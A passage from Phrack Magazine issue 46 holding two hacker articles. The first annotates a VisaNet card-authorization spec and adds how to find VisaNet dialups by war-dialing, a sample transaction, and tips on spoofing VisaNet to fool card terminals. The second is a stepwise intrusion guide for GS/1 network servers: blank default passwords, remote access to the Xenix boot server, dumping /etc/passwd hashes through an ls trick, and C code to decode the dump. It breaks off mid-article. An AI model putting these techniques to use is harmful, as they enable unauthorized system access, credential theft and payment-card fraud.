This alphanumeric field will contain a validation code. The code will contain a
four-character value if the payment service indicator value is an "A" or it will
be zero in length if the payment service indicator value is not an "A". This
value is stored in the batch detail record for terminals that capture and is
mandatory for REPS qualification.
5.14 FIELD SEPARATOR
The authorization record format specifies the use of the "FS" character.
5.15 NETWORK IDENTIFICATION CODE
This one-character fixed length field contains the identification code of the
network on which the transaction was authorized. The network ID must be printed
on the receipt.
5.16 SETTLEMENT DATE
This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system (MMDD). The settlement date must be printed
on the receipt.
5.17 SYSTEM TRACE AUDIT NUMBER
This six-character fixed length field contains a trace audit number which is
assigned by the authorizing system. The trace audit number must be printed on
the receipt.
5.18 RETRIEVAL REFERENCE NUMBER
This twelve-character fixed length field contains the transaction retrieval
reference number returned by the authorizing system. The reference number
should be printed on the receipt.
5.19 LOCAL TRANSACTION TIME
This six-digit fixed length field contains the transaction time returned by the
authorizing system (HHMMSS). The time must be printed on the receipt.
6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
The following subsections define the debit confirmation response record data
elements.
6.01 NETWORK IDENTIFICATION CODE
This one character fixed length field contains the identification code of the
network on which the transaction was authorized. The network ID is printed on
the receipt.
6.02 SETTLEMENT DATE
This four-digit fixed length field contains the transaction settlement date
returned by the authorizing system.
6.03 SYSTEM TRACE AUDIT NUMBER
This six-character fixed length field contains the system trace audit number
which is assigned by the authorizing system.
7.0 CHARACTER CODE DEFINITIONS
The following subsections will define the authorization request record character
set and character sets used for track 1 and track 2 data encoded on the magnetic
stripes.
The authorization request records are generated with characters defined by ANSI
X3.4-1986. The data stored on the cardholder's card in magnetic or optical form
must be converted to the ANSI X3.4 character set before transmission to VisaNet.
Section 7.01 provides track 1 character set definition. Section 7.02 provides
track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and
ISO 646 character set definitions. Section 7.04 provides a cross reference
between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05
describes the method for generating and checking the Mod 10 Luhn check digit for
credit card account numbers. Section 7.06 describes the method for generating
the LRC byte for the authorization request message and for testing the card
swipe's LRC byte. Section 7.07 provides sample data for an authorization
request and response for record format "J" testing.
The POS device/authorization must perform the following operations on track
read data before it can be used in an authorization request message.
1. The LRC must be calculated for the data read from the track and compared
to the LRC read from the track. The track data is assumed to be read
without errors when on character parity errors are detected and the
calculated and read LRC's match.
2. The starting sentinel, ending sentinel, and LRC are discarded.
3. The character codes read from the magnetic stripe must be converted from
the encoded character set to the set used for the authorization request
message. The characters encoded on track 1 are six-bit plus parity codes
and the characters encoded on track 2 are four-bit plus parity codes, with
the character set used for the request message defined as seven-bit plus
parity codes.
All characters read from a track must be converted to the request message
character set and transmitted as part of the request. The converted track data
can not be modified by adding or deleting non-framing characters and must be a
one-for-one representation of the characters read from the track. [sounds like
they mean it, eh?]
7.1 TRACK 1 CHARACTER DEFINITION
Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions. This
"standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ. Actual cards may differ [not], whether
they are Visa cards or any other issuer's cards.
Each character is defined by the six-bit codes listed in Table 7.01.
Track 1 can be encoded with up to 79 characters as shown in Figure 7.01
+---------------------------------------------------------+
|SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC|
+---------------------------------------------------------+
LEGEND:
Field Description Length Format
--------------------------------------------------------------------------------
SS Start Sentinel 1 %
FC Format Code ("B" for credit cards) 1 A/N
PAN Primary Account Number 19 max NUM
FS Field Separator 1 ^
NAME Card Holder Name (See NOTE below) 26 max A/N
FS Field Separator 1 ^
DATE Expiration Date (YYMM) 4 NUM
Discretionary Data Option Issuer Data (See NOTE below) variable A/N
ES End Sentinel 1 ?
LRC Longitudinal Redundancy Check 1
---
Total CAN NOT exceed 79 bytes-----> 79
--------------------------------------------------------------------------------
FIGURE 7.01
Track 1 Encoding Definition
NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator
and a "." as the title separator
The DISCRETIONARY DATA can contain any of the printable characters from
Table 7.01
TABLE 7.01
Track 1 Character Definition
b6 0 0 1 1
BIT NUMBER b5 0 1 0 1 (a) These character positions
------------------------------------------- are for hardware use only
b4 b3 b2 b1 ROW/COL 0 1 2 3
------------------------------------------- (b) These characters are for
0 0 0 0 0 SP 0 (a) P country use only, not for
0 0 0 1 1 (a) 1 A Q international use
0 0 1 0 2 (a) 2 B R
0 0 1 1 3 (c) 3 C S (c) These characters are
0 1 0 0 4 $ 4 D T reserved for added
0 1 0 1 5 (%) 5 E U graphic use [nifty]
0 1 1 0 6 (a) 6 F V
0 1 1 1 7 (a) 7 G W
1 0 0 0 8 ( 8 H X (%) Start sentinel
1 0 0 1 9 ) 9 I Y (/) End sentinel
1 0 1 0 A (a) (a) J Z (^) Field Separator
1 0 1 1 B (a) (a) K (b) / Surname separator
1 1 0 0 C (a) (a) L (b) . Title separator
1 1 0 1 D - (a) M (b) SP Space
1 1 1 0 E - (a) N (^) +-----------------------+
1 1 1 1 F / (?) O (a) |PAR|MSB|B5|B4|B3|B2|LSB|
+-+---+-----------------+
| |--- Most Significant Bit
|--- Parity Bit (ODD)
Read LSB First
7.02 TRACK 2 CHARACTER DEFINITION
Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. This
"standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ. Actual cards may differ, whether they are
Visa cards or any other issuer's cards.
Each character is defined by the four-bit codes listed in Table 7.02.
Track 2 can be encoded with up to 40 characters as shown in Figure 7.02.
+--------------------------------------------------------+
|SS| PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC|
+--------------------------------------------------------+
LEGEND:
Field Description Length Format
--------------------------------------------------------------------------------
SS Start Sentinel 1 0B hex
PAN Primary Account Number 19 max NUM
FS Field Separator 1 =
Discretionary Data Option Issuer Data (See NOTE below) variable A/N
ES End Sentinel 1 0F hex
LRC Longitudinal Redundancy Check 1
---
Total CAN NOT exceed 40 bytes-----> 40
--------------------------------------------------------------------------------
FIGURE 7.02
Track 2 Encoding Definition
NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be
numeric with optional field separators as specified in Table 7.02.
TABLE 7.02
Track 2 Character Set
b4 b3 b2 b1 COL (a) These characters are for
------------------------------ hardware use only
0 0 0 0 0 0
0 0 0 1 1 1 (B) Starting Sentinel
0 0 1 0 2 2
0 0 1 1 3 3 (D) Field Separator
0 1 0 0 4 4
0 1 0 1 5 5 (F) Ending Sentinel
0 1 1 0 6 6
0 1 1 1 7 7
1 0 0 0 8 8 +---------------------------+
1 0 0 1 9 9 | PAR | MSB | b3 | b2 | LSB |
1 0 1 0 A (a) +---------------------------+
1 0 1 1 B (B) | |
1 1 0 0 C (a) | |--- Most Significant Bit
1 1 0 1 D (D) |--- Parity Bit (ODD)
1 1 1 0 E (a)
1 1 1 1 F (F) Read LSB first
[ tables 7.03a, 7.03b, and 7.04 deleted...
If you really need a fucking ascii table that bad go buy a book.]
[ section 7.05 - Account Data Luhn Check deleted...
as being unnecessary obtuse and roundabout in explaining how the check works.
the routine written by crazed luddite and murdering thug is much clearer. ]
7.06 CALCULATING AN LRC
When creating or testing the LRC for the read of the card swipe, the
authorization request record, the debit confirmation record or the VisaNet
response record; use the following steps to calculate the LRC:
1) The value of each bit in the LRC character, excluding the parity bit, is
defined such that the total count of ONE bits encoded in the corresponding
bit location of all characters of the data shall be even (this is also known
as an EXCLUSIVE OR (XOR) operation)
For card swipes, include the start sentinel, all the data read and
the end sentinel.
For VisaNet protocol messages, begin with the first character past
the STX, up to and including the ETX.
2) The LRC characters parity bit is not a parity bit for the individual parity
bits of the data message, but it only the parity bit for the LRC character
itself. Calculated as an even parity bit.
[ i list a routine for calculating an LRC o a string later on in the document ]
7.07 TEST DATA FOR RECORD FORMAT "J"
The following two sections provide sample data for testing record format "J"
with the VisaNet dial system.
7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
Table 7.07a provides a set of test data for record format "J" authorization
request.
TABLE 7.07a
Test Data For Record Format "J"
Test Data Byte # Length Format Field Name
--------------------------------------------------------------------------------
J 1 1 A/N Record Format
0, 2, or 4 2 1 A/N Application Type
. 3 1 A/N Message Delimiter
401205 4-9 6 A/N Acquirer BIN
123456789012 10-21 12 NUM Merchant Number
0001 * 22-25 4 NUM Store Number
0001 * 26-29 4 NUM Terminal Number
5999 30-33 4 NUM Merchant Category Code
840 34-36 3 NUM Merchant Country Code
94546 37-41 5 A/N Merchant City Code
108 42-44 3 NUM Time Zone Differential
54 45-46 2 A/N Authorization Transaction Code
12345678 47-54 8 NUM Terminal Identification Number
Y 55 1 A/N Payment Service Indicator
0001 * 56-59 4 NUM Transaction Sequence Number
@ 60 1 A/N Cardholder Identification Code
D, H, T, or X 61 1 A/N Account Data Source
Track or Customer Data Field
Manual Data
"FS" N.A. 1 "FS" Field Separator
0000123 N.A. 0 to 43 A/N Transaction Amount
"FS" N.A. 1 "FS" Field Separator
ER N.A. 0 or 2 A/N Device Code/Industry code
"FS" N.A. 1 "FS" Field Separator
N.A. 0 or 6 NUM Issuing/Receiving Institution ID
"FS" N.A. 1 "FS" Field Separator
000 N.A. 3 to 12 NUM Secondary Amount (Cashback)
"FS" N.A. 1 "FS" Field Separator
--------------------------------------------------------------------------------
NOTE:* Denotes fields that are returned in the response message
7.07.2 RESPONSE MESSAGE FOR TEST DATA
Table 7.07b provides the response message for the test data provided in section
7.07.1.
TABLE 7.07b
Response Message For Test Data - Record Format "J"
Test Data Byte # Length Format Field Name
--------------------------------------------------------------------------------
A, Y, N, or * 1 1 A/N Payment Service Indicator
"space"
0001 * 2-5 4 NUM Store Number
0001 * 6-9 4 NUM Terminal Number
5 * 1 1 A/N Authorization Source Code
0001 * 11-14 4 NUM Transaction Sequence Number
00 * 15-16 2 A/N Response Code
12AB45 * 17-22 6 A/N Approval Code
111992 * 23-28 6 NUM Transaction Date (MMDDYY)
AP ______ 29-44 16 A/N Authorization Response Message
0, Sp, or "FS" 45 1 A/N AVS Result Code
*Variable 0 or 15 NUM Transaction Identifier
"FS" "FS" Field Separator
*Variable 0 or 4 A/N Validation Code
"FS" "FS" Field Separator
--------------------------------------------------------------------------------
NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)
--------------------------------------------------------------------------------
[ section two ]
[ finding visanet ]
finding visanet isn't hard, but it can be tedious. visanet rents time off of
compuserve and X.25 networks. the compuserve nodes used are not the same
as their information service, cis. to identify a visanet dialup after
connecting, watch for three enq characters and a three second span to hangup.
if you've scanned out a moderate portion of your area code, you probably have a
few dialups. one idea is to write a short program to dial all the connects you
have marked as garbage or worthless [ you did keep em, right? ] and wait
for the proper sequence. X.25 connections should work similarly, but i don't
know for sure. read the section on visanet usage for other dialup sources.
[ section three ]
[ visanet link level protocol ]
messages to/from visanet have a standard format:
stx - message - etx - lrc
the message portion is the record formats covered in section one. lrc values
are calculated starting with the first byte of message, going up to and
including the etx character. heres an algorithm that calculates the lrc for a
string. note: in order to work with the visanet protocols, append etx to the
string before calling this function.
unsigned char func_makelrc(char *buff)
{
int i;
char ch, *p;
ch = 0;
p = buff;
for(;;) {
ch = (ch^(*p));
p++;
if(!(*p))
break;
}
return ch;
}
for a single authorization exchange, the easiest kind of transaction, the
sequence goes like this:
host enq stx-response-etx-lrc eot
term stx-request-etx-lrc ack
<disconnect>
matching this sequence with test record formats from section one, 7.07, heres
an ascii representation of a transaction. control characters denoted in <>'s.
[of course, you wouldn't really have a carriage return in middle of a message.
duh. ] this transaction would be for card number 4444111122223333 with an
expiration date of 04/96. the purchase amount is $1.23. visanet responds with
an approval code of 12ab45.
host: <enq>
term: <stx>J0.401205123456789012000100015999840945461085412345678Y0001@H444411
1122223333<fs>0496<fs>0000123<fs>ER<fs><fs>000<fs><etx><lrc>
host: <stx>Y00010001500010012AB45111992APPROVAL 12AB45123456789012345<fs>
ABCD<fs><etx><lrc>
term: <ack>
host: <eot>
authorizing multiple transactions during one connect session is only slightly
more complicated. the etx character on all messages sent to visanet are changed
to etb and the application type is changed from '0' to '2' [section one 4.02].
instead of responding after a transaction with eot, visanet instead polls the
terminal again with enq. this continues until the terminal either changes back
to the single transaction format or issues an eot to the host.
heres a short list of all control characters used:
stx: start-of-text, first message framing character signaling message start
etx: end-of-text, the frame ending character the last message of a sequence
eot: end-of-transmission, used to end an exchange and signal disconnect
enq: enquiry, an invitation to transmit a message or retransmit last item
ack: affirmative acknowledgment, follows correct reception of message
nak: negative acknowledgment, used to indicate that the message was not
understood or was received with errors
syn: delay character, wait thirty seconds
etb: end-of-block, the end framing character used to signal the end of a message
within a multiple message sequence
other quick notes: visanet sometimes sends ack before stx on responses
lrc characters can hold any value, such as stx, nak, etc
visanet can say goodbye at any time by sending eot
people can get very anal about error flow diagrams
[ section four ]
[ half the story; central data capture ]
a full transaction requires two steps, one of which is described in this
document: getting the initial authorization. an authorization does basically
nothing to a person's account. oh, you could shut somebody's account down for
a day or two by requesting a twenty thousand dollar authorization, but no other
ill effects would result. central data capture, the second and final step in a
transaction, needs information from both the authorization request and
response, which is used to generate additional data records. these records are
then sent to visanet by the merchant in a group, usually at the end of each day.
[ section five ]
[ common applications ]
access to visanet can be implemented in a number of ways: directly on a pos
terminal, indirectly via a lan, in a hardware specific device, or any
permutation possible to perform the necessary procedures. card swipers commonly
seen at malls are low tech, leased at around fifty dollars per month, per
terminal. they have limited capacity, but are useful in that all of the
information necessary for transactions is self contained. dr delam and maldoror
found this out, and were delighted to play the role of visanet in fooling the
little device. close scrutiny of section one reveals atm formats, phone order
procedures, and new services such as direct debit from checking/savings and
checks by phone. start noticing the stickers for telecheck and visa atm cards,
and you're starting to get the picture.
[ section seven ]
[ brave new world ]
could it be? yes, expiration dates really don't matter....
this article written to thank previous Phrack writers...
please thank me appropriately...
800#s exist...
other services exist... mastercard runs one...
never underestimate the power of asking nicely...
numerous other formats are available... see section one, 3.0 for hints...
never whistle while you're pissing... ==Phrack Magazine==
Volume Five, Issue Forty-Six, File 17 of 28
****************************************************************************
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<> <>]
[<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
[<> <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<> <>]
[<> Brought to you by: <>]
[<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
[<> <>]
[<> Story line: Maldoror -n- [)r. [)elam <>]
[<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
[<> Unix Technical Expertise: Wunder-Boy [)elam <>]
[<> Sysco Technishun: Marvelous Maldoror <>]
[<> <>]
[<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
[<> Non-CoNForMisT products already on the market such as <>]
[<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
[<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
[<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
[<> identification program), and various other programs and <>]
[<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
[<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
[<> <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
Index
========================================
1. Finding and identifying a GS/1
2. Getting help
3. Gaining top privilege access
4. Finding the boot server
5. Connecting to the boot server
6. Getting the boot server password file
7. Other avenues
----------------------------------------------------------------------------
Here's hacking a GS/1 made EZ (for the sophisticated hacker) It is
advisable to fill your stein with Sysco and pay close attention... if
Sysco is not available in your area, Hacker Pschorr beer will work
almost as good... (especially Oktoberfest variety)
What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a server, like a DEC or Xyplex.
So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
wasting the GS/1.. the French fone police will fly over to your country
and hunt you down like a wild pack of dogs, then hang you by your own
twisted pair.)
What to do:
-----------
+--------------------------------------+
+ #1. Finding and identifying a GS/1 +
+--------------------------------------+
Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be. A
few years ago there were quite a number of GS/1's laying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC's. (If you don't know what the hell I'm talking about, look at
some old Phracks and LOD tech. journals.)
The prompt will look similar to this:
(!2) GS/1>
(The (!2) refers to the port you are on)
+--------------------+
+ #2. Getting help +
+--------------------+
First try typing a '?' to display help items.
A help listing looks like this:
> (!2) GS/1>?
> Connect <address>[,<address>] [ ECM ] [ Q ]
> DO <macro-name>
> Echo <string>
> Listen
> Pause [<seconds>]
> PIng <address> [ timeout ]
> SET <param-name> = <value> ...
> SHow <argument> ...
At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):
> (!2) GS/1# ?
> BRoadcast ( <address> ) <string>
> Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ]
> DEFine <macro-name> = ( <text> )
> DisConnect ( <address> ) [<session number>]
> DO ( <address> ) <macro-name>
> Echo <string>
> Listen ( <address> )
> Pause [<seconds>]
> PIng <address> [ timeout ]
> ReaD ( <address> ) <option> <parameter>
> REMOTE <address>
> ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] , ...
> SAve ( <address> ) <option> <filename>
> SET ( <address> ) <param-name> = <value> ...
> SETDefault ( <address> ) [<param-name> = <value>] ...
> SHow ( <address> ) <argument> ...
> UNDefine ( <address> ) <macro-name>
> UNSave ( <address> ) <filename>
> ZeroMacros ( <address> )
> ZeroStats ( <address> )
Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.
If you need in-depth help for any of the commands, you can again use the
'?' in the following fashion:
> (!2) GS/1>sho ?
> SHow ADDRess
> SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ]
> SHow DefaultParameters [<param-name> ...]
> SHow GLobalPARameters
> SHow NetMAP [ Short | Long ]
> SHow PARAmeterS [<param-name> ...]
> SHow <param-name> ...
> SHow SESsions [ P ]
> SHow VERSion
> (!2) GS/1>sh add?
> SHow ADDRess
> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2
"sh add" displays your own network, address and port number.
The network is 000023B5
The address is 07000201E1D7
The port number is 2
+------------------------------------+
+ #3. Gaining top privilege access +
+------------------------------------+
Figure out the global password.
Do a "set priv=global" command.
Note:
----
There are 3 states to set priv to: user, local, and global. Global is
the state with the most privilege. When you attain global privilege,
your prompt will change to have a '#' sign at the end of it.. this means
you have top priceless (similar to *nix's super user prompt).
The GS/1 will prompt you for a password. The default password on GS/1's
is to have no password at all... The GS/1 will still prompt you for a
password, but you can enter anything at this point if the password was
never set.
+-------------------------------+
+ #4. Finding the boot server +
+-------------------------------+
Figure out the boot server address available from this GS/1 ..
The boot server is what lies under the GS/1. We've found that GS/1's are
actually run on a Xenix operating system.. (which is of course a nice
phamiliar territory) It's debatable whether all GS/1's are run on Xenix or
not as we have yet to contact the company. (We may put out a 2nd file going
into more detail.)
Do a "sh b" or "sh global" as shown in the following examples:
> (!2) GS/1# sh b
> BAud = 9600 BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
> BSDelay = None BUffersize = 82
> (!2) GS/1# sh global
> ...............................Global Parameters............................
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz" Organization = "delam0"
> PROmpt = "GS/1>" NMPrompt = "GS/1# "
> LocalPassWord = "" GlobalPassWord = "haque-me"
> NetMapBroadcast = ON MacType = EtherNET
> CONNectAudit = ON ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781
Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
... these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" matches any string). You'll only be able to
"sh global" after a successful "set priv=global".
Now that you have the boot server address, the next step is enabling
communication to the boot server.
+-------------------------------------+
+ #5. Connecting to the boot server +
+-------------------------------------+
Do a REMOTE <address> where address is the address of the machine you
want to issue remote commands to.
> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
> BInd <address> [-f <bootfile>] [-l <loader>] [<nports>]
> BRoadcast ( <address> ) "<string>"
> CoPyfile [<address>:]<pathname> [<address>:][<pathname>]
> LiSt [ -ls1CR ] [<pathname> ...]
> MoVe <pathname> <pathname>
> NAme <clearinghouse name> = <address>[,<address>]...
> Ping <address> [timeout]
> ReMove <pathname> ...
> SET [( <address> )] <param-name> = <value> ...
> SETDefault <param-name> = <value> ...
> SHow <argument>
> UNBind <address>
> UNDefine <macro name>
> UNName <name>
> ZeroStats
> <BREAK> (to leave remote mode)
Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE <address> command.
Notice for this case, the boot server's address was used.
When you get the REMOTE: prompt, you can issue commands that will be
executed on the remote machine. Try doing a '?' to see if it's another
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).
> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
Look familiar?? If not, go to the nearest convenient store and buy the
a 12 pack of the cheapest beer you can find.. leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.
You're basically doing a Remote Procedure Call for ls to your Xenix boot
server.
Notice at this point that the "passwd" is not owned by root. This is
because this is not the system password file, and you are not in the
"/etc" directory... (yet)
There are a couple of problems:
> (!2) Remote: cat
> Invalid REMOTE command
>
> (!2) Remote: cd /etc
> Invalid REMOTE command
You cannot view files and you cannot change directories.
To solve the "cd" problem do the following:
> (!2) Remote: ls -l ..
> total 26
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
> -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
> -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
> -rw------- 1 root root 427 Aug 17 1989 .profile
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
> -r-------- 1 bin bin 25526 May 4 1989 boot
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
> -r-------- 1 bin bin 577 Nov 3 1987 dos
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
> drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
> drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
> -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
> -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
Your brain should now experience deja vous.. you just found the
root directory. (for the non-*nix, lam0-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
Now you can get to /etc/passwd as follows:
> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x 1 bin bin 7110 May 8 1989 accton
> -rwx------ 1 bin bin 1943 May 8 1989 asktime
> -rwx------ 1 bin bin 31756 May 8 1989 badtrk
> -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
> -rwx--x--x 1 bin bin 24726 May 8 1989 brand
> -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
> -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
> -rwx------ 1 bin bin 2857 May 8 1989 chsh
> -rwx------ 1 bin bin 7550 May 8 1989 clri
> -rwx------ 1 bin bin 8034 May 8 1989 cmos
> -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
> -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
> ...... etc.
> -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
Yeah, now what?!
You've found the /etc/passwd file, but you don't have "cat" to type the
file out. Now you're stuck... so drink a half a bottle of Sysco per
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
like us... make sure it's the big bottle kind not those girly small
onez.)
+---------------------------------------------+
+ #6. Getting the boot server password file +
+---------------------------------------------+
There is one way to get around the cat problem (no itz n0t puttin
catnip laced with somethin U made frum a phile on yer doorstep)
It's done using ls. On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.
Note about directory structure for the inquisitive hacker:
In a directory record there is a 14 byte string containing the file
name, and the 2 byte I-number (2 bytes = an integer in this case)
which is a number that is an (I)ndex pointer to the I-node. The
I-node then contains the information about where the file's data is
actually kept (similar to how a FAT table works on an IBM PC yet a
different concept as it has indirect index blocks etc. I won't get
into) and what permissions are set for the file. Be warned that in
newer *nix implementations, file names can be more than 14 characters
and the directory structure will be a bit different than discussed.
The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what's in the directory"... newer *nix
systems won't like this (the -f option) because of the new directory
structure.
> (!2) Remote: ls -?
> ls: illegal option --?
> usage: -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
> 22327 xcU:100:100:NC 8275 operator:/usr/
>
> (!2) Remote: <BRK>
> (!2) GS/1#
Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.
The password file is almost legible, but the I-numbers still need to be
converted to ASCII characters. This can be accomplished in a variety of
ways... the easiest is to write a program like the following in C:
On a PC the following code should work:
#include <stdio.h>
main()
{
union {
int i;
char c[2];
} x;
while (1) {
printf("Enter I-Number: ");
scanf("%d", &x.i);
printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
}
}
On a *nix based system the following code will work (depending on
word size and byte arrangement):
#include <stdio.h>
main()
{
union {
short int i;
char c[2];
} x;
while (1) {
printf("Enter I-Number: ");
scanf("%hd", &x.i);
printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
}
}
When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):
